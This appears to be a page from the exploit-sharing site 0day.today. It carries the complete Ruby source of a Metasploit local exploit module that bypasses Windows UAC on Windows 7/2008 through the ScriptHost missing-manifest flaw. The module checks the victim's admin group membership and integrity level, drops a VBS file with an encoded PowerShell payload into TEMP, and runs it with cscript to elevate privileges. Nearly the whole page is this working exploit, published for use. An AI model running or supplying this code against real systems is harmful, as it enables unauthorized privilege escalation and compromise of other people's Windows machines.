0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) Exploit
[##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::FileDropper
include Exploit::Powershell
include Post::File
include Post::Windows::Priv
include Post::Windows::Runas
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
'Description' => %q{
This module will bypass Windows UAC by utilizing the missing .manifest on the script host
cscript/wscript.exe binaries.
},
'License' => MSF_LICENSE,
'Author' => [
'Vozzie',
'Ben Campbell'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html',
'URL', 'https://github.com/Vozzie/uacscript'
]
],
'DisclosureDate'=> 'Aug 22 2015'
))
end
def exploit
# Validate that we can actually do things before we bother
# doing any more work
validate_environment!
check_permissions!
# get all required environment variables in one shot instead. This
# is a better approach because we don't constantly make calls through
# the session to get the variables.
env_vars = get_envs('TEMP', 'WINDIR')
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"
upload_vbs(vbs_filepath)
cmd_exec("cscript.exe //B #{vbs_filepath}")
end
def check_permissions!
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
def upload_vbs(payload_filepath)
vbs = File.read(File.join(Msf::Config.data_directory,
'exploits',
'scripthost_uac_bypass',
'bypass.vbs'))
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
vbs.gsub!('COMMAND', command)
print_status('Uploading the Payload VBS to the filesystem...')
begin
vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
write_file(payload_filepath, vbs)
register_file_for_cleanup(payload_filepath)
rescue Rex::Post::Meterpreter::RequestError => e
fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
end
end
def validate_environment!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
winver = sysinfo['OS']
case winver
when /Windows (7|2008)/
print_good("#{winver} may be vulnerable.")
else
fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
end
if is_uac_enabled?
print_status('UAC is Enabled, checking level...')
else
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
end
end
# 0day.today [2024-07-07] #